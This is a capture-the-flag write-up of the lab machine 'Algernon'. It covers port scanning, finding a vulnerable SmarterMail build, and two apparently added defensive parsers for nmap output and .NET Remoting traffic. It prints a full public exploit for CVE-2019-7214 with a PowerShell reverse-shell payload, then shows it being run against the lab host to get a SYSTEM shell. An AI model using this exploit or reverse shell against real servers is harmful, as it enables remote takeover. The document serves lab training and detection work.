Algernon

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.171.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 01:13 EST
Nmap scan report for 192.168.171.65
Host is up, received echo-reply ttl 125 (0.12s latency).
Scanned at 2025-11-11 01:13:35 EST for 208s 
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  09:31PM       <DIR>          ImapRetrieval
| 11-10-25  10:12PM       <DIR>          Logs
| 04-29-20  09:31PM       <DIR>          PopRetrieval
|_11-10-25  10:12PM       <DIR>          Spool
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
5040/tcp  open  unknown       syn-ack ttl 125
9998/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Tue, 11 Nov 2025 06:16:49 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
|_http-favicon: Unknown favicon MD5: 9D7294CAAB5C2DF4CD916F53653714D5
|_http-server-header: Microsoft-IIS/10.0
17001/tcp open  remoting      syn-ack ttl 125 MS .NET Remoting services
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
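The scan above is the raw material for the rest of the box, and a defender reviewing the same output would want the same three findings pulled out mechanically: anonymous FTP, the risky TRACE verb on IIS, and the exposed .NET Remoting channel. The following parser for nmap's normal output is an added example written for this write-up, not part of nmap; parse_nmap_normal and triage are names chosen here, and SAMPLE_SCAN is an excerpt copied from the scan above (nmap prints the REASON column with --reason or -vv, which is why the parser checks the header for it).

```python
"""Parse nmap 'normal' output (the .nmap file -oA writes) into per-port records
and flag the exposures visible in the scan.  Added example for this write-up,
not part of nmap; function names are chosen here and SAMPLE_SCAN is an excerpt
copied from the scan above."""
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_11-10-25  10:12PM       <DIR>          Spool
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds? syn-ack ttl 125
17001/tcp open  remoting      syn-ack ttl 125 MS .NET Remoting services
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# With --reason (or -vv) nmap puts "<reason> ttl <n>" in front of the VERSION text.
REASON_PREFIX = re.compile(r"^\S+(?:\s+ttl\s+\d+)?\s*")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)   # NSE output lines, prefix stripped


def parse_nmap_normal(text: str) -> list:
    """Return one PortRecord per port line, with NSE script lines attached."""
    records, current, has_reason = [], None, False
    for line in text.splitlines():
        if line.startswith("PORT "):              # column header: learn the layout
            has_reason = "REASON" in line
            continue
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, rest = m.groups()
            if has_reason:
                rest = REASON_PREFIX.sub("", rest)
            current = PortRecord(int(port), proto, state, service, rest.strip())
            records.append(current)
        elif line.startswith("|") and current is not None:
            current.scripts.append(line.lstrip("|_ ").rstrip())
    return records


def triage(records: list) -> list:
    """Map the parsed records to (port, finding) pairs a defender would act on."""
    findings = []
    for r in records:
        if r.state != "open":
            continue
        text = " ".join(r.scripts)
        if r.service == "ftp" and "Anonymous FTP login allowed" in text:
            findings.append((r.port, "anonymous FTP login enabled; disable it or "
                                     "restrict the anonymous root to read-only"))
        m = re.search(r"Potentially risky methods:\s*(.+)", text)
        if m:
            findings.append((r.port, f"risky HTTP methods enabled: {m.group(1).strip()}; "
                                     "deny the verb in IIS request filtering"))
        if ".NET Remoting" in r.version:
            findings.append((r.port, "exposed .NET Remoting TCP channel (legacy "
                                     "BinaryFormatter transport); firewall it or bind to localhost"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"{port}: {finding}")
```

Running it over the excerpt prints the three findings in port order; pointing it at the full nmap/services.nmap file from -oA gives the same result for every scripted port.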

FTP (21):

I logged in as anonymous, but did not find anything useful.

HTTP (80):

Just this page.

HTTP (9998):

Browsing to that port:

We have SmarterMail running; I could not log in with the default credentials.

Let's view the source code to find the exact version:

Search for public exploits:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ searchsploit smartermail
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
SmarterMail 16 - Arbitrary File Upload                                                                                                    | multiple/webapps/48580.py
SmarterMail 7.1.3876 - Directory Traversal                                                                                                | windows/remote/15048.txt
SmarterMail 7.3/7.4 - Multiple Vulnerabilities                                                                                            | asp/webapps/16955.txt
SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities                                                                           | asp/webapps/16975.txt
SmarterMail < 7.2.3925 - LDAP Injection                                                                                                   | asp/webapps/15189.txt
SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting                                                                                  | asp/webapps/15185.txt
SmarterMail Build 6985 - Remote Code Execution                                                                                            | windows/remote/49216.py
SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting                                                                | asp/webapps/31017.php
smartermail free 9.2 - Persistent Cross-Site Scripting                                                                                    | windows/webapps/20362.py
SmarterTools SmarterMail 4.3 - 'Subject' HTML Injection                                                                                   | php/webapps/31240.txt
SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service                                                                    | windows/dos/31607.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

There is an RCE exploit for a build number close to ours.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ searchsploit -m windows/remote/49216.py
  Exploit: SmarterMail Build 6985 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49216
     Path: /usr/share/exploitdb/exploits/windows/remote/49216.py
    Codes: CVE-2019-7214
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (4852)
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Algernon/49216.py

Read the script:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ cat 49216.py
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Homepage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3

import base64
import socket
import sys
from struct import pack

HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444

psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
psh_shell = base64.b64encode(psh_shell)
psh_shell = psh_shell.ljust(1360, b' ')

payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0c<snipped>V0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
payload = base64.b64decode(payload)
payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)

uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))

msg = bytes()
msg += b'.NET'                 # Header
msg += b'\x01'                 # Version Major
msg += b'\x00'                 # Version Minor
msg += b'\x00\x00'             # Operation Type
msg += b'\x00\x00'             # Content Distribution
msg += pack('I', len(payload)) # Data Length
msg += b'\x04\x00'             # URI Header 
msg += b'\x01'                 # Data Type
msg += b'\x01'                 # Encoding - UTF8
msg += pack('I', len(uri))     # URI Length 
msg += uri                     # URI
msg += b'\x00\x00'             # Terminating Header
msg += payload                 # Data

s.send(msg)
s.close()

As shown above, it targets the port we have not yet examined (17001).

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ nc -nv 192.168.171.65 17001              
(UNKNOWN) [192.168.171.65] 17001 (?) open
asdf
.NETSystem.Runtime.Remoting.RemotingException: Tcp channel protocol violation: expecting preamble.
   at System.Runtime.Remoting.Channels.Tcp.TcpSocketHandler.ReadAndMatchPreamble()
   at System.Runtime.Remoting.Channels.Tcp.TcpSocketHandler.ReadVersionAndOperation(UInt16& operation)
   at System.Runtime.Remoting.Channels.Tcp.TcpServerSocketHandler.ReadHeaders()
   at System.Runtime.Remoting.Channels.Tcp.TcpServerTransportSink.ServiceRequest(Object state)
   at System.Runtime.Remoting.Channels.SocketHandler.ProcessRequestNow()

Indeed, the exception confirms a .NET Remoting TCP channel is listening there: the server read our junk bytes and rejected them because they did not start with the .NET preamble.
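The script's msg assembly and the "expecting preamble" exception describe the same thing from two sides: the TCP channel expects a .NET preamble, a version, a data length, a URI header and a terminating header before the serialized body. For a network defender the useful artefact is a parser that recognises that framing in captured traffic and flags a body that is a BinaryFormatter stream (the decoded payload in the script begins with the 00 01 00 00 00 FF FF FF FF serialization header record). The code below is an added example for this write-up, not code from the exploit, from SmarterMail or from any .NET library; build_frame, parse_remoting_frame, looks_like_binaryformatter and classify_request are names chosen here, the header token values follow the layout the script itself emits, and the sample frame and payload are constructed (the body is a header record plus filler, not a working gadget chain).

```python
"""Parse a .NET Remoting TCP-channel request frame, the wire format 49216.py
assembles byte by byte, and flag requests whose body is a BinaryFormatter
stream.  Added example for this write-up, not code from the exploit, from
SmarterMail or from any .NET library; the sample frame and payload are constructed."""
import base64
import re
from struct import pack, unpack_from, error as StructError

PREAMBLE = b".NET"
HDR_REQUEST_URI = 0x0004       # header token carrying the request URI
HDR_END = 0x0000               # terminating header
DTYPE_COUNTED_STRING = 0x01
ENC_UTF8 = 0x01
# A BinaryFormatter stream opens with a SerializationHeaderRecord: record type 0,
# then int32 root id, header id, major version (1) and minor version (0).
BF_HEADER_LEN = 17
# The script smuggles its UTF-16 command as a long base64 run inside the body;
# a detector can flag such runs without caring what they decode to.
BASE64_BLOB = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")


def build_frame(uri: str, payload: bytes) -> bytes:
    """Assemble a request frame in the layout the script uses (test fixture only)."""
    uri_b = uri.encode("utf-8")
    return (PREAMBLE
            + b"\x01\x00"                  # protocol version 1.0
            + b"\x00\x00"                  # operation type: request
            + b"\x00\x00"                  # content distribution: not chunked
            + pack("<I", len(payload))     # data length (little-endian, as pack('I') on x86)
            + pack("<H", HDR_REQUEST_URI) + bytes([DTYPE_COUNTED_STRING, ENC_UTF8])
            + pack("<I", len(uri_b)) + uri_b
            + pack("<H", HDR_END)
            + payload)


def parse_remoting_frame(buf: bytes) -> dict:
    """Split one frame into its fields; raise ValueError on anything malformed."""
    if not buf.startswith(PREAMBLE):
        # Server-side equivalent: the "expecting preamble" exception seen with nc.
        raise ValueError("not a .NET Remoting frame: preamble missing")
    try:
        major, minor = buf[4], buf[5]
        op_type, content_dist = unpack_from("<HH", buf, 6)
        (data_len,) = unpack_from("<I", buf, 10)
        off, uri = 14, None
        while True:
            (htype,) = unpack_from("<H", buf, off)
            off += 2
            if htype == HDR_END:
                break
            if htype != HDR_REQUEST_URI:
                raise ValueError(f"unsupported header token 0x{htype:04x}")
            dtype, enc = buf[off], buf[off + 1]
            if dtype != DTYPE_COUNTED_STRING or enc != ENC_UTF8:
                raise ValueError("unexpected URI encoding")
            (slen,) = unpack_from("<I", buf, off + 2)
            off += 6
            uri = buf[off:off + slen].decode("utf-8")
            off += slen
    except (IndexError, StructError) as exc:
        raise ValueError("truncated frame header") from exc
    payload = buf[off:off + data_len]
    if len(payload) != data_len:
        raise ValueError("truncated payload")
    return {"version": (major, minor), "operation": op_type,
            "content_distribution": content_dist, "uri": uri, "payload": payload}


def looks_like_binaryformatter(payload: bytes) -> bool:
    """True if the body starts with a BinaryFormatter header record (version 1.0)."""
    if len(payload) < BF_HEADER_LEN or payload[0] != 0x00:
        return False
    _root_id, _header_id, major, minor = unpack_from("<iiii", payload, 1)
    return (major, minor) == (1, 0)


def classify_request(frame: dict) -> list:
    """Return detection tags for a parsed frame (empty list means nothing notable)."""
    tags = []
    if looks_like_binaryformatter(frame["payload"]):
        tags.append("binaryformatter-payload")
    if BASE64_BLOB.search(frame["payload"]):
        tags.append("long-base64-blob")
    return tags


# Constructed sample: a BinaryFormatter header record (root id 1, header id -1,
# version 1.0) followed by base64 filler where a real payload carries its command.
SAMPLE_PAYLOAD = b"\x00" + pack("<iiii", 1, -1, 1, 0) + base64.b64encode(b"\x00" * 600)
SAMPLE_FRAME = build_frame("tcp://192.0.2.10:17001/Servers", SAMPLE_PAYLOAD)

if __name__ == "__main__":
    parsed = parse_remoting_frame(SAMPLE_FRAME)
    print(parsed["uri"], classify_request(parsed))
```

Feeding the parser the literal bytes nc sent (asdf plus a newline) raises the preamble error, which is exactly the condition the server reported; feeding it the constructed frame yields the URI and both tags. The same two checks are what an IDS rule on port 17001 would encode: alert on a .NET preamble from an unexpected source, and escalate when the body opens with a serialization header record.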

Modify the script with the target IP and our own IP and port:

<snipped>

HOST='192.168.171.65'
PORT=17001
LHOST='192.168.45.187'
LPORT=80

<snipped>

Start a netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ rlwrap nc -nlvp 80 
listening on [any] 80 ...

Run the exploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ python3 49216.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Algernon]
└─$ rlwrap nc -nlvp 80 
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.171.65] 50032

PS C:\Windows\system32> whoami
nt authority\system

We have a reverse shell as system.

Get the flag:

PS C:\Windows\system32> type \Users\Administrator\Desktop\proof.txt
2e65abb1b3529539a12111a8084c2903
